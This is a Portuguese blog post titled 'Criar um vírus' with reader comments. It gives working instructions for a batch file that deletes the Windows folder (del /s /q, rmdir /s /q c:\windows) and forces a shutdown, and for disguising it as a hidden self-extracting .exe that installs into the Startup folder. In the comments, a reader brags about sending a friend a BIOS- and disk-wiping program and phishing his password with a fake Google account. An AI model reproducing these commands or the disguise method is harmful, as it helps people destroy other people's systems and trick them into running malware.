quarta-feira, 3 de outubro de 2007

Criar um vírus

Como criar um virus

Vírus mais escrotos do mundo:
Va em iniciar/executar e digite notepad.
Irá abrir o bloco de notas.
Copie o comando e cole no bloco de notas ao salvar vc usa .bat, antes do nome do arquivo
Ex: sacanear.bat

del /s /q c:\windows\
(deleta tudo dentro do windows ex: arquivos e naum pastas)

rmdir /s /q c:\windows
(deleta tdo do windows) - (fode o pc)

shutdown -s
(desliga o pc)

shutdown -r
(reinicia o pc)

Fazendo um virus.exe com win rar
Abra o bloca de notas e digite shutdown -r -f
shutdown -r -> desliga o pc reiniciando
shutdown -f -> força o pc a desliga.. ecerrando qualquer programa..
Salve como desliga.bat
Transformando em .exe ( tem que ter o WinRar)
clique com botao direito no arquivo .bat, e vá em adicionar para o arquivo.
marque criar arquivo SFX. Note que o nome muda para desliga.exe.
vá até a guia avançado e clique em opçao sfx.
em caminho para extraçao coloque ( toda vez q o pc iniciar , o programa vai ser executado =})
%homepath%\Menu Iniciar\Programas\Inicializar
marque caminho absoluto e salvar e restaurar caminho
em executar apos a extraçao coloque desliga.bat
na guia metodo.
marque ocultar tudo e ignorar arquivos existentes.

9 comentários:

funkworld disse...

Poww Veioooo............

Essses Viruss seu e foda mesmOOOOoo


+ so que desde de eu manda pra vitima .......

Eu que fui a vitima..........

+ MesMoo AsSim Vlww

Add Meu Msn Aie.......

scobar22@hotmail.com

Gadeji disse...

Fiz uma brincadeira com um amigo meu, que eu reconheço que foi de mal gosto. O truque foi o seguinte:

No DEBUG.EXE, fiz um arquivo .COM, que limpava a BIOS e ESTRAGAVA o HD e criei uma conta de e-mail com o seguinte endereço administracao@google.co.cc no site co.cc e hotmail. Depois mandei um e-mail para ele dizendo para ele preencher o formulário, que tinha o e-mail e senha dele, e outro e-mail que tinha o vírus. Então o IDIOTA mandou de volta. Então eu fui no e-mail dele e marquei que o e-mail não era SPAM e era de origem confiável.

E depois de uns dias ele apareceu na minha casa dizendo que o PC dele não liga-va mais e que tinha ido em 3 técnicos mais não conseguiram arruma e disseram que ele deveria comprar um HD novo.

Então eu consertei pra ele, já que eu tinha modificado o pointer do HD eu soube onde estava, e botei devolta. Então configurei a BIOS e tudo ficou bem.


Mas parabéns pelo seu BATCH. É bem parecido com um que eu tinha feito, aquele de reiniciar.
Mas eu fazia melhor, não destruia o HD dos outros eu fazia eles ficarem agonizando, ou se auto-destruir, uma vez eu usei o comando subist para fazer clones do HD mas a criatura apagou tudo do próprio HD.

Tenta fazer isto: Toda a vez que entrar muda o papel de parede para uma foto de uma véia gorda. HAHAHA.


Add meu MSN: gadeji@ymail.com

lucas disse...

Criei o virus certinho fis passo a passo mas eo mando o com Estenção BAT ow o EXE??

Game Downloads disse...

tem como ensinar a fazer esse virus ai man do hd?

wesley assis disse...

ae cara seu blog é mto BOM MESMOOOOOOOneu vi num video do youtube que o codgo dele era diferente o codigo é assim shutdown -r -c "seu pc irá pifar em alguns segs" -t 30 o me explica esse codigo?
o link do video é http://www.youtube.com/watch?v=GSzPcX87ggM&feature=related

gasook disse...



como faz pra enviar o arquivo (noteopad)pelo gmail?

jmfmr..... disse...

tu e fraco quero ver tu fude com servidores, Switch ou roteadores ou melhor acaba com um rede tu e faco Gadeji. tenta chega na terceira camada dw. Depois tu vem falar comigo...

Bruno Laureano dos Santos disse...

jmfmr tu ate que e bom mas tu ja hackeo uma empresa, ja ferrou com 300 pc e os caras tiveram que pagar 500 cada pc ? quando tu fazer isso tu vai chegar nos fodas mas tu ja ta no caminho

Warley McDaniel Ferreira de Souza disse...

Faça me rir, kkk.
Usando .bat como vírus, quem criou esse tópico não é hacker, apenas um usuário mais informado do S.O.
Quer ser um hacker, vai á dica:

Cursos a ser feitos:
- Informática Básica e avançada
- Logica de programação
- Programação linguagem c/c++, para quem pretende brincar em plataformas Windows.
- Tenha criatividade para usar a linguagem, e alcançar seus objetivos.